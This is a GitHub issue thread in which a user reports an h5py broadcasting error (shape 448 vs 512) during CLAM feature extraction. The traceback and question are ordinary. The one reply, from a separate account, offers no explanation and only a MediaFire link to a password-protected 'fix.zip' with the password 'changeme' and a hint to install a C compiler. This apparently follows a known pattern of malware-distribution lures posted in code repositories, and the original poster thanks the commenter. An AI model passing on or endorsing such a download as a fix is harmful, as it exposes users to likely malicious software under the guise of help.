### ISSUE TITLE
特征提取时的错误

### ISSUE THREAD

**Issue by yshtj2000** [liupei101/AdvMIL#6]
作者您好！
我在使用clam对特征进行提取的时候遇到了一个问题，具体错误如下：
Traceback (most recent call last):
  File "/home/CLAM/extract_features_fp.py", line 130, in <module>
    output_file_path = compute_w_loader(output_path, loader = loader, model = model, verbose = 1)
  File "/home/CLAM/extract_features_fp.py", line 66, in compute_w_loader
    save_hdf5(output_path, asset_dict, attr_dict=None, mode=mode)
  File "/home/CLAM/utils/file_utils.py", line 33, in save_hdf5
    dset[-data_shape[0]:] = val
  File "h5py/_objects.pyx", line 54, in h5py._objects.with_phil.wrapper
  File "h5py/_objects.pyx", line 55, in h5py._objects.with_phil.wrapper
  File "/home/anaconda3/envs/clam/lib/python3.10/site-packages/h5py/_hl/dataset.py", line 997, in __setitem__
    mspace = h5s.create_simple(selection.expand_shape(mshape))
  File "/home/anaconda3/envs/clam/lib/python3.10/site-packages/h5py/_hl/selections.py", line 264, in expand_shape
    raise TypeError("Can't broadcast %s -> %s" % (source_shape, self.array_shape))  # array shape
TypeError: Can't broadcast (2, 448) -> (2, 512)
![屏幕截图 2024-09-27 112130](https://github.com/user-attachments/assets/2dedf36e-4e5c-4488-b678-6dfa11930104)，
请问您有遇到过相似的问题吗？

**Comment by SagarChandra07** [comment]
I think this will help you.
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme

you may need to install the c compiler

**Comment by yshtj2000** [comment]
thanks for your help!
